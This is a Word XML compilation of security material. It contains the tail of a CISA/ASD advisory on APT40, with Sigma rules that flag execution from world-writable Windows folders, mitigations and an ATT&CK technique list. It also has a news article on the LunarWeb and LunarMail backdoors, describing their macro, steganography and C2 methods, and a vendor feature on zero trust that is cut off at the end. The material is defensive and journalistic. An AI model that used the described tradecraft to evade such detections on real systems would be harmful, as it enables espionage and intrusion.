        <w:t>Investigate contextual process, network, file and other supporting data on the host to help make an assessment as to whether the activity is malicious. If necessary attempt to collect a copy of the file for reverse engineering to determine whether it is legitimate.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References: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mattifestation / WorldWritableDirs.txt Process Execution from an Unusual Directory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Author: ASD's ACSC</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Date: 2024/06/19</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Status: experimental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Tags: tlp.green classification.au.official attack.execution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Log source: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category: process_creation product: windows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Detection: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writable_path: Image|contains: ':\\$Recycle.Bin\\' ':\\AMD\\Temp\\' ':\\Intel\\' ':\\PerfLogs\\' ':\\Windows\\addins\\' ':\\Windows\\appcompat\\' ':\\Windows\\apppatch\\' ':\\Windows\\AppReadiness\\' ':\\Windows\\bcastdvr\\' ':\\Windows\\Boot\\' ':\\Windows\\Branding\\' ':\\Windows\\CbsTemp\\' ':\\Windows\\Containers\\' ':\\Windows\\csc\\' ':\\Windows\\Cursors\\' ':\\Windows\\debug\\' ':\\Windows\\diagnostics\\' ':\\Windows\\DigitalLocker\\' ':\\Windows\\dot3svc\\' ':\\Windows\\en-US\\' ':\\Windows\\Fonts\\' ':\\Windows\\Globalization\\' ':\\Windows\\Help\\' ':\\Windows\\IdentityCRL\\' ':\\Windows\\IME\\' ':\\Windows\\ImmersiveControlPanel\\' ':\\Windows\\INF\\' ':\\Windows\\intel\\' ':\\Windows\\L2Schemas\\' ':\\Windows\\LiveKernelReports\\' ':\\Windows\\Logs\\' ':\\Windows\\media\\' ':\\Windows\\Migration\\' ':\\Windows\\ModemLogs\\' ':\\Windows\\ms\\' ':\\Windows\\OCR\\' ':\\Windows\\panther\\' ':\\Windows\\Performance\\' ':\\Windows\\PLA\\' ':\\Windows\\PolicyDefinitions\\' ':\\Windows\\Prefetch\\' ':\\Windows\\PrintDialog\\' ':\\Windows\\Provisioning\\' ':\\Windows\\Registration\\CRMLog\\' ':\\Windows\\RemotePackages\\' ':\\Windows\\rescache\\' ':\\Windows\\Resources\\' ':\\Windows\\SchCache\\' ':\\Windows\\schemas\\' ':\\Windows\\security\\' ':\\Windows\\ServiceState\\' ':\\Windows\\servicing\\' ':\\Windows\\Setup\\' ':\\Windows\\ShellComponents\\' ':\\Windows\\ShellExperiences\\' ':\\Windows\\SKB\\' ':\\Windows\\TAPI\\' ':\\Windows\\Tasks\\' ':\\Windows\\TextInput\\' ':\\Windows\\tracing\\' ':\\Windows\\Vss\\' ':\\Windows\\WaaS\\' ':\\Windows\\Web\\' ':\\Windows\\wlansvc\\' ':\\Windows\\System32\\Com\\dmp\\' ':\\Windows\\System32\\FxsTmp\\' ':\\Windows\\System32\\Microsoft\\Crypto\\RSA\\MachineKeys\\' ':\\Windows\\System32\\Speech\\' ':\\Windows\\System32\\spool\\drivers\\color\\' ':\\Windows\\System32\\spool\\PRINTERS\\' ':\\Windows\\System32\\spool\\SERVERS\\' ':\\Windows\\System32\\Tasks_Migrated\\Microsoft\\Windows\\PLA\\System\\' ':\\Windows\\System32\\Tasks\\' ':\\Windows\\SysWOW64\\Com\\dmp\\' ':\\Windows\\SysWOW64\\FxsTmp\\' ':\\Windows\\SysWOW64\\Tasks\\'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appdata: Image|contains: '\\AppData\\' User: 'SYSTEM' condition: writable_path and not appdata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False positives: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Allowlist auditing applications have been observed running executables from these directories.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plausible that scripts and administrative tools used in the monitored environment(s) may be located in one of these directories and should be addressed on a case-by-case basis.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Level: high Title: World Writable Execution - Users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ID: 6dda3843-182a-4214-9263-925a80b4c634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Description: Detect process execution from C:\Users\Public\* and other world writable folders within Users.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Background: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AppData folders are excluded if a file is run as SYSTEM - this is a benign way in which many temporary application files are executed.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Investigation: Examine information directly associated with this file execution, such as the user context, execution integrity level, immediate follow-on activity and images loaded by the file.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Investigate contextual process, network, file and other supporting data on the host to help make an assessment as to whether the activity is malicious. If necessary attempt to collect a copy of the file for reverse engineering to determine whether it is legitimate.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References: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Process Execution from an Unusual Directory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Author: ASD's ACSC</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Date: 2024/06/19</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Status: experimental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Tags: tlp.green classification.au.official attack.execution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Log source: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category: process_creation product: windows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Detection: users: Image|contains: ':\\Users\\All Users\\' ':\\Users\\Contacts\\' ':\\Users\\Default\\' ':\\Users\\Public\\' ':\\Users\\Searches\\'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appdata: Image|contains: '\\AppData\\' User: 'SYSTEM' condition: users and not appdata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False positives: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plausible that scripts and administrative tools used in the monitored environment(s) may be located in Public or a subdirectory and should be addressed on a case-by-case basis.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Level: medium Mitigations Logging</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During ASD's ACSC investigations, a common issue that reduces the effectiveness and speed of investigative efforts is a lack of comprehensive and historical logging information across a number of areas including web server request logs, Windows event logs and internet proxy logs.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ASD's ACSC recommends reviewing and implementing their guidance on Windows Event Logging and Forwarding including the configuration files and scripts in the Windows Event Logging Repository and the Information Security Manual's Guidelines for System Monitoring, to include centralizing logs and retaining logs for a suitable period. Patch Management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Promptly patch all internet exposed devices and services, including web servers, web applications, and remote access gateways. Consider implementing a centralised patch management system to automate and expedite the process. ASD's ACSC recommend implementation of the ISM's Guidelines for System Management, specifically, the System Patching controls where applicable.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exploits utilized by the actor were publicly known and had patches or mitigations available.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Organizations should ensure that security patches or mitigations are applied to internet facing infrastructure within 48 hours, and where possible, use the latest versions of software and operating systems. Network Segmentation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Network segmentation can make it significantly more difficult for adversaries to locate and gain access to an organizations sensitive data. Segment networks to limit or block lateral movement by denying traffic between computers unless required. Important servers such as Active Directory and other authentication servers should only be able to be administered from a limited number of intermediary servers or "jump servers." These servers should be closely monitored, be well secured and limit which users and devices are able to connect to them.</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Regardless of instances identified where lateral movement is prevented, additional network segmentation could have further limited the amount of data the actors were able to access and extract. Additional Mitigations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authoring agencies also recommend the following mitigations to combat APT40 and others' use of the TTPs below.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Disable unused or unnecessary network services, ports and protocols. Use well-tuned Web application firewalls (WAFs) to protect webservers and applications.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Enforce least privilege to limit access to servers, file shares, and other resources.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Use multi-factor authentication (MFA) and managed service accounts to make credentials harder to crack and reuse. MFA should be applied to all internet accessible remote access services, including: Web and cloud-based email; Collaboration platforms; Virtual private network connections; and Remote desktop services.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Replace end-of-life equipment. Mitigation Strategies/Techniques TTP Essential Eight Mitigation Strategies ISM Controls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Initial Access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T1190</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Exploitation of Public-Facing Application Patch applications Patch operating systems Multi-factor authentication Application control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ISM-0140</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ISM-1698</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ISM-1701</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ISM-1921</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ISM-1876</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ISM-1877</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ISM-1905</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Execution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T1059</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Command and Scripting Interpreter Application control Restrict Microsoft Office macros Restrict administrative privileges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ISM-0140</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ISM-1490</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ISM-1622</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ISM-1623</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ISM-1657</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ISM-1890</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Persistence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T1505.003</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Server Software Component: Web Shell Application Control Restrict administrative privileges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ISM-0140</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ISM-1246</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ISM-1746</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ISM-1249</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ISM-1250</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ISM-1490</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ISM-1657</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ISM-1871</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Initial Access / Privilege Escalation / Persistence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T1078</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Valid Accounts Patch operating systems Multi-factor authentication Restrict administrative privileges Application control User application hardening</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ISM-0140</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ISM-0859</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ISM-1546</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ISM-1504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ISM-1679</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additional general detection and mitigation advice, please consult the Mitigations and Detection sections on the MITRE ATT&amp;CK technique web page for each of the techniques identified in the MITRE ATT&amp;CK summary at the end of this advisory. Reporting</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Australian organizations: visit cyber.gov.au or call 1300 292 371 (1300 CYBER 1) to report cybersecurity incidents and to access alerts and advisories.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Canadian organizations: report incidents by emailing CCCS at contact@cyber.gc.ca.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New Zealand organizations: report cyber security incidents to incidents@ncsc.govt.nz or call 04 498 7654.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United Kingdom organizations: report a significant cyber security incident at National Cyber Security Centre (monitored 24 hours) or, for urgent assistance, call 03000 200 973.</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 organizations: report incidents and anomalous activity to CISA 24/7 Operations Center at report@cisa.gov or (888) 282-0870 and/or to the FBI via your local FBI field office, the FBI's 24/7 CyWatch at (855) 292-3937, or CyWatch@fbi.gov. When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. Disclaimer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The information in this report is being provided "as is" for informational purposes only. The authoring agencies do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by the authoring agencies. MITRE ATT&amp;CK - Historical APT40 Tradecraft of Interest Reconnaissance (TA0043) Search Victim-Owned Websites [T1594] Gather Victim Identity Information: Credentials [T1589.001] Active Scanning: Vulnerability Scanning [T1595.002] Gather Victim Host Information [T1592] Search Open Websites/Domains: Search Engines [T1593.002] Gather Victim Network Information: Domain Properties [T1590.001] Gather Victim Identity Information: Email Addresses [T1589.002] Resource Development (TA0042) Acquire Infrastructure: Domains [T1583.001] Acquire Infrastructure [T1583] Acquire Infrastructure: DNS Server [T1583.002] Compromise Accounts [T1586] Develop Capabilities: Code Signing Certificates [T1587.002] Compromise Infrastructure [T1584] Develop Capabilities: Digital Certificates [T1587.003] Develop Capabilities: Malware [T1587.001] Obtain Capabilities: Code Signing Certificates [T1588.003] Establish Accounts: Cloud Accounts [T1585.003] Compromise Infrastructure: Network Devices [T1584.008] Obtain Capabilities: Digital Certificates [T1588.004] Initial Access (TA0001) Valid Accounts [T1078] Phishing [T1566] Valid Accounts: Default Accounts [T1078.001] Phishing: Spearphishing Attachment [T1566.001] Valid Accounts: Domain Accounts [T1078.002] Phishing: Spearphishing Link [T1566.002] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">External Remote Services [T1133] Exploit Public-Facing Application [T1190] Drive-by Compromise [T1189] Execution (TA0002) Windows Management Instrumentation [T1047] Command and Scripting Interpreter: Python [T1059.006] Scheduled Task/Job: At [T1053.002] Command and Scripting Interpreter: JavaScript [T1059.007] Scheduled Task/Job: Scheduled Task [T1053.005] Native API [T1106] Command and Scripting Interpreter [T1059] Inter-Process Communication [T1559] Command and Scripting Interpreter: Windows Command Shell [T1059.003] System Services: Service Execution [T1569.002] Command and Scripting Interpreter: PowerShell [T1059.001] Exploitation for Client Execution [T1203] Command and Scripting Interpreter: Visual Basic [T1059.005] User Execution: Malicious File [T1204.002] Command and Scripting Interpreter: Unix Shell [T1059.004] Command and Scripting Interpreter: Apple Script [T1059.002] Scheduled Task/Job: Cron [T1053.003] Software Deployment Tools [T1072] Persistence (TA0003) Valid Accounts [T1078] Server Software Component: Web Shell [T1505.003] Office Application Startup: Office Template Macros [T1137.001] Create or Modify System Process: Windows Service [T1543.003] Scheduled Task/Job: At [T1053.002] Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder [T1547.001] Scheduled Task/Job: Scheduled Task [T1053.005] Boot or Logon Autostart Execution: Shortcut Modification [T1547.009] External Remote Services [T1133] Hijack Execution Flow: DLL Search Order Hijacking [T1574.001] Scheduled Task/Job: Cron [T1053.003] Hijack Execution Flow: DLL Side- Loading [T1574.002] Account Manipulation [T1098] Valid Accounts: Cloud Accounts [T1078.004] Valid Accounts: Domain Accounts [T1078.002] Privilege Escalation (TA0004) Scheduled Task/Job: At [T1053.002] Create or Modify System Process: Windows Service [T1543.003] Scheduled Task/Job: Scheduled Task [T1053.005] Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder [T1547.001] Process Injection: Thread Execution Hijacking [T1055.003] Boot or Logon Autostart Execution: Shortcut Modification [T1547.009] Process Injection: Process Hollowing [T1055.012] Hijack Execution Flow: DLL Search Order Hijacking [T1574.001] Valid Accounts: Domain Accounts [T1078.002] Exploitation for Privilege Escalation [T1068] Access Token Manipulation: Token Impersonation/Theft [T1134.001] Event Triggered Execution: Unix Shell Configuration Modification [T1546.004] Process Injection: Dynamic-link Library Injection [T1055.001] Valid Accounts: Domain Accounts [T1078.002] Valid Accounts: Local Accounts [T1078.003] Defense Evasion (TA0005) Rootkit [T1014] Indirect Command Execution [T1202] Obfuscated Files or Information [T1027] System Binary Proxy Execution: Mshta [T1218.005] Obfuscated Files or Information: Software Packing [T1027.002] System Binary Proxy Execution: Regsvr32 [T1218.010] Obfuscated Files or Information: Steganography [T1027.003] Subvert Trust Controls: Code Signing [T1553.002] Obfuscated Files or Information: Compile After Delivery [T1027.004] File and Directory Permissions Modifications: Linux and Mac File and Directory Permissions Modification [T1222.002] Masquerading: Match Legitimate Name or Location [T1036.005] Virtualisation/Sandbox Evasion: System Checks [T1497.001] Process Injection: Thread Execution Hijacking [T1055.003] Masquerading [T1036] Reflective Code Loading [T1620] Impair Defences: Disable or Modify System Firewall [T1562.004] Process Injection: Process Hollowing [T1055.012] Hide Artifacts: Hidden Files and Directories [T1564.001] Indicator Removal: File Deletion [T1070.004] Hide Artifacts: Hidden Window [T1564.003] Indicator Removal: Timestomp [T1070.006] Hijack Execution Flow: DLL Search Order Hijacking [T1574.001] Indicator Removal: Clear Windows Event Logs [T1070.001] Hijack Execution Flow: DLL Side-Loading [T1574.002] Modify Registry [T1112] Web Service [T1102] Deobfuscate/Decode Files or Information [T1140] Masquerading: Masquerade Task or Service [T1036.004] Impair Defenses [T1562] Credential Access (TA0006) OS Credential Dumping: LSASS Memory [T1003.001] Unsecured Credentials: Credentials in Files [T1552.001] OS Credential Dumping: NTDS [T1003.003] Brute Force: Password Guessing [T1110.001] Network Sniffing [T1040] Forced Authentication [T1187] Credentials from Password Stores: Keychain [T1555.001] Steal or Forge Kerberos Tickets: Kerberoasting [T1558.003] Input Capture: Keylogging [T1056.001] Multi-Factor Authentication Interception [T1111] Steal Web Session Cookie [T1539] Steal Application Access Token [T1528] Exploitation for Credential Access [T1212] Brute Force: Password Cracking [T1110.002] Input Capture: Web Portal Capture [T1056.003] OS Credential Dumping: DCSync [T1003.006] Credentials from Password Stores [T1555] Credentials from Password Stores: Credentials from Web Browsers [T1555.003] Discovery (TA0007) System Service Discovery [T1007] System Information Discovery [T1082] Application Window Discovery [T1010] Account Discovery: Local Account [T1087.001] Query Registry [T1012] System Information Discovery, Technique T1082 - Enterprise | MITRE ATT&amp;CK(R) File and Directory Discovery [T1083] System Time Discovery [T1124] Network Service Discovery [T1046] System Owner/User Discovery [T1033] Remote System Discovery [T1018] Domain Trust Discovery [T1482] Account Discovery: Email Account [T1087.003] Account Discovery: Domain Account [T1087.002] System Network Connections Discovery [T1049] Virtualisation/Sandbox Evasion: System Checks [T1497.001] Process Discovery [T1057] Software Discovery [T1518] Permission Groups Discovery: Domain Groups [T1069.002] Network Share Discovery, Technique T1135 - Enterprise | MITRE ATT&amp;CK(R) System Network Configuration Discovery: Internet Connection Discovery [T1016.001] Lateral Movement (TA0008) Remote Services: Remote Desktop Protocol [T1021.001] Remote Services [T1021] Remote Services: SMB/Windows Admin Shares [T1021.002] Use Alternate Authentication Material: Pass the Ticket [T1550.003] Remote Services: Windows Remote Management [T1021.006] Lateral Tool Transfer [T1570] Collection (TA0009) Data from Local System [T1005] Archive Collected Data: Archive via Library [T1560.002] Data from Network Shared Drive [T1039] Email Collection: Remote Email Collection [T1114.002] Input Capture: Keylogging [T1056.001] Clipboard Data [T1115] Automated Collection [T1119] Data from Information Repositories [T1213] Input Capture: Web Portal Capture [T1056.003] Data Staged: Remote Data Staging [T1074.002] Data Staged: Local Data Staging [T1074.001] Archive Collected Data [T1560] Email Collection [T1114] Exfiltration (TA0010) Exfiltration Over C2 Channel [T1041] Exfiltration Over </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Alternative Protocol: Exfiltration Over Asymmetric Encrypted Non-C2 Protocol [T1048.002] Exfiltration Over Alternative Protocol [T1048] Exfiltration Over Web Service: Exfiltration to Cloud Storage [T1567.002] Command and Control (TA0011) Data Obfuscation: Protocol Impersonation [T1001.003] Web Service: Dead Drop Resolver [T1102.001] Commonly Used Port [T1043] Web Service: One-way Communication [T1102.003] Application Layer Protocol: Web Protocols [T1071.001] Ingress Tool Transfer [T1105] Application Layer Protocol: File Transfer Protocols [T1071.002] Proxy: Internal Proxy [T1090.001] Proxy: External Proxy [T1090.002] Non-Standard Port [T1571] Proxy: Multi-hop Proxy [T1090.003] Protocol Tunnelling [T1572] Web Service: Bidirectional Communication [T1102.002] Encrypted Channel [T1573] Encrypted Channel: Asymmetric Cryptography [T1573.002] Ingress Tool Transfer [T1105] Proxy, Technique T1090 - Enterprise | MITRE ATT&amp;CK(R) Impact (TA0040) Service Stop [T1489] Disk Wipe [T1561] System Shutdown/Reboot [T1529] Resource Hijacking [T1496] Notes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 U.S. Department of Justice. 2021. Four Chinese Nationals Working with the Ministry of State Security Charged with Global Computer Intrusion Campaign Targeting Intellectual Property and Confidential Business Information, Including Infectious Disease Research.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>[2] In this context, an endpoint is a function of the web application. [3] Service accounts are not tied to individual users, but rather to services. In a Microsoft corporate domain, there are various kinds of accounts.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>[4] Mounting shares is the process of making files on a file system structure accessible to a user or user group.</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product is provided subject to this Notification and this Privacy &amp; Use policy.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00093949" w:rsidRDefault="00093949" w:rsidP="00093949">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Cybersecurity and Infrastructure Security Agency 2024.07.09 08:52</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-190a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>***</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00093949" w:rsidRDefault="00093949" w:rsidP="00093949">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Russian hackers use new Lunar malware to breach a European govt's agencies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Bill Toulas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May 16, 2024 11:57 AM</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Security researchers discovered two previously unseen backdoors dubbed LunarWeb and LunarMail that were used to compromise a European government's diplomatic institutions abroad.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pieces of malware have been used to breach the Ministry of Foreign Affairs of a European country with diplomatic missions in the Middle East and have been active since at least 2020.</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Researchers at cybersecurity company ESET believe that the backdoors may be connected to the Russian state-sponsored hacker group Turla, although attribution has medium confidence at this point. Lunar attack chain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its report, ESET says that the attack starts with spear-phishing emails that carry Word files with malicious macro code to install the LunarMail backdoor onto the target system.</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VBA macro also establishes persistence on the infected host by creating an Outlook add-in, ensuring it is activated whenever the email client is launched.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ESET analysts have also seen evidence pointing to the potential abuse of a misconfigured open-source network monitoring tool Zabbix to drop the LunarWeb payload.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Specifically, a component mimicking a Zabbix agent log is deployed on a server, and when accessed with a specific password via an HTTP request, it decrypts and executes the loader and backdoor components.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LunarWeb persists on the breached device using several techniques that include creating Group Policy extensions, replacing system DLLs, and deploying as part of legitimate software.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Both payloads are decrypted by a malware loader that the researchers called ‘LunarLoader' from an encrypted blob using the RC4 and AES-256 ciphers. The loader uses the DNS domain name for decryption and ensures that it runs only within the targeted environment.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Once the Lunar backdoors are running on the host, the attackers may send commands directly via the command and control (C2) server and use stolen credentials and compromised domain controllers for lateral movement on the network.</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LunarWeb and LunarMail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two Lunar backdoors are designed for prolonged and covert surveillance, data theft, and maintaining control over compromised systems, such as high- value targets like government and diplomatic institutions.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LunarWeb is deployed on servers, mimicking legitimate traffic by spoofing HTTP headers from Windows and ESET product updates.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receives commands for execution which are hidden in .JPG and .GIF image files using the steganopraphy technique.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commands LunarWeb supports include executing shell and PowerShell commands, collecting system information, running Lua code, zipping files, and exfiltrating data in AES-256 encrypted form.</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ESET researchers say that they observed an attack where the threat actor dropped LunarWeb at three diplomatic institutions of the targeted European Ministry of Foreign Affairs just minutes apart.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The attacker may have been able to move this quickly because they had previously gained access to the domain controller of the ministry and leveraged it to move to machines from other institutions on the network.</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LunarMail is deployed on user workstations with Microsoft Outlook installed.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uses an email-based communication system (Outlook MAPI) for data exchange with specific Outlook profiles linked to the C2 to evade detection in environments where HTTPS traffic may be more closely monitored.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Commands sent from the C2 are embedded in email attachments, typically hidden in .PNG images, which the backdoor parses to extract the hidden instructions.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LunarMail can create processes, take screenshots, write files, and run Lua code. Lua script execution allows it to indirectly run shell and PowerShell commands if needed.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Based on similarities in observed tactics, techniques, and procedures (TTPs) between the Lunar toolset and and past activities, ESET attributes the backdoors to the Russian hacking group Turla with medium confidence.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the researchers noticed "varying degrees of sophistication in the compromises," which suggests that the tools were developed and operated by multiple individuals.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Despite the intrusions being of a more recent date, ESET found artifacts indicating that the backdoors have been used in operations and evaded detection since at least 2020.</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cybersecurity company is providing a list of indicators of compromise (IoCs) for files, file paths, network, and registry keys observed in compromised environments. A complete list is available here.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00093949" w:rsidRDefault="00093949" w:rsidP="00093949">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>BleepingComputer 2024.05.16 19:29</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>https://www.bleepingcomputer.com/news/security/russian-hackers-use-new-lunar-malware-to-breach-a-european-govts-agencies/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>***</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00093949" w:rsidRDefault="00093949" w:rsidP="00093949">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>The next step up for high-impact identity authorization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How SSH Communications Security cuts through the hype around Zero Trust to secure the connections that matter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John E Dunn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Mon 29 Apr 2024 // 02:45 UTC</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Feature As business enters the 2020s, organizations find themselves protecting fast-expanding digital estates using security concepts that are decades old.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computing industry is supposed to be addicted to constant change and yet some core features - the password for instance - remain remarkably untouched.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three primary ways in which attackers access an organization are stolen credentials, phishing and exploitation of vulnerabilities, according to Verizon. From a risk perspective, this could be interpreted as increasingly chaotic and insecure. Networks allow connectivity from anywhere and for anyone, including by third-party service providers whose access is difficult to monitor. Data moves constantly between networks, including to and from on-premise systems and remote cloud platforms that were built to be shared utilities rather than corporate security systems. Employees, meanwhile, communicate and collaborate using email and messaging platforms, exchanging sensitive data in ways the security teams can't even see.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It's a computing model serviced by a vast array of credentials, identities, and permissions whose underlying management has been creaking at the seams for years. Organizations have reacted with more management layers to lock down data, and a growing volume of security such as multi-factor authentication (MFA) that is always easier to plan than manage in reality.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parallel, network complexity continues to grow, taking in operational technology (OT), cloud platforms, and orchestration systems, as well as the on-premise data centers kept through necessity. Adding to this in most sectors is an array of data transfer and remote connectivity based on RDP, VNC, SSH, and VPNs, firewalls as well as proprietary Operational Technology (OT) protocols (Modbus, Profinet, EtherNet/IP).</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long procession of security breaches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Unavoidably, there are gaps and oversights, which is why security breaches have become so routine. The biggest weakness seen in most breaches is the continuing reliance on password credentials. A good illustration of this is what happened to single sign-on (SSO) identity provider (IdP) Okta in September 2023, an incident during which admin credentials for the company's customer support system were inadvertently leaked through a privileged employee's personal Gmail account. This gave attackers access to session tokens for several customers, leading to the compromise of customer accounts whose number and scope are still not clear.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Another example of the same problem was the earlier ransomware compromise of the MOVEit file transfer application used by thousands of organizations to move data around their networks. From these incidents, several patterns jump out. The first is that the compromise of a single privileged account - or simply a privileged adjacent account - can undermine an entire organization in minutes. When this happens in a third-party service provider, that compromise can break open the carefully constructed security of thousands of other companies in one go. Worst of all, this can happen without anyone knowing about it until serious data loss occurs.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second one is that companies are not using 'security-first' solutions to transfer critical or sensitive data. Since all data is not created equal, protecting high-impact information should be a priority.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Breaches have become more frequent despite regulators bearing down on organizations with onerous rules. At first, it was largely sector-specific regulations such as HIPAA and PCI DSS. But these soon expanded to universal regimes such as the GDPR and the EU's new Network and Information Systems Directive (NIS)2. Organizations must also accommodate increasingly complex data sovereignty requirements. Even an application as unremarkable as WhatsApp can lead to huge fines for organizations falling foul of SEC rules when it's used irresponsibly in regulated sectors or fails to meet record- keeping requirements.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Tackling tool sprawl and complexity head-on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Historically, data security has tended to be implemented on a piecemeal basis. But in many cases this leads to a fragmentation in which organizations deploy multiple tools and platforms to address problems connected to passwords, data encryption, OT security, and remote access. And that just serves to drive up complexity while guaranteeing additional management overhead and cost.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Security vendor SSH Communications Security recently took this issue of tool sprawl and complexity head-on with the launch of its PrivX Zero Trust Suite. This offers several capabilities in a single platform, which means a range of security issues can be addressed in a modular way through a single, integrated platform. It also allows organizations to implement the principle of zero trust across their infrastructure, critical when managing credentials for the tiny percentage of privileged accounts that spell danger in the wrong hands. To that end, the Suite comprises a range of capabilities divided into modules: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core of the Zero Trust Suite is built on PrivX, a privileged access management (PAM) system designed to overcome the weaknesses of traditional password credentials when used with high-risk accounts. This includes abandoning passwords altogether in favor of ephemeral 'just-in-time' certificates which can only be used for a single session. This helps to manage third-party access while removing the possibility of permanent credentials being abused or lost.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environments that require conventional secrets (passwords, API tokens, certificates), PrivX offers a secure Secrets Vault, which avoids the problem of hackers breaking into the network and stealing hardcoded or unsecured credentials, says the company. For OT environments, all of the above applies, but PrivX is also equipped with Network Target Access (NTA) functionality that enables access based on industrial communication protocols.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SSH Communications Security argues that this ability to track and manage every type of credential in a centralized way is fundamental to securing privileged accounts, citing one customer who discovered it had a million SSH keys alone throughout its environment. Equally, being able to dispense with permanent credentials such as passwords removes the chore of having to constantly rotate and store them.</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 verify the ID of high-impact users, comes equipped with strong, phishing- resistant multi-factor authentication (MFA) for access, says the company. When extended with device trust, the security posture of the device and the validity of the session is continuously 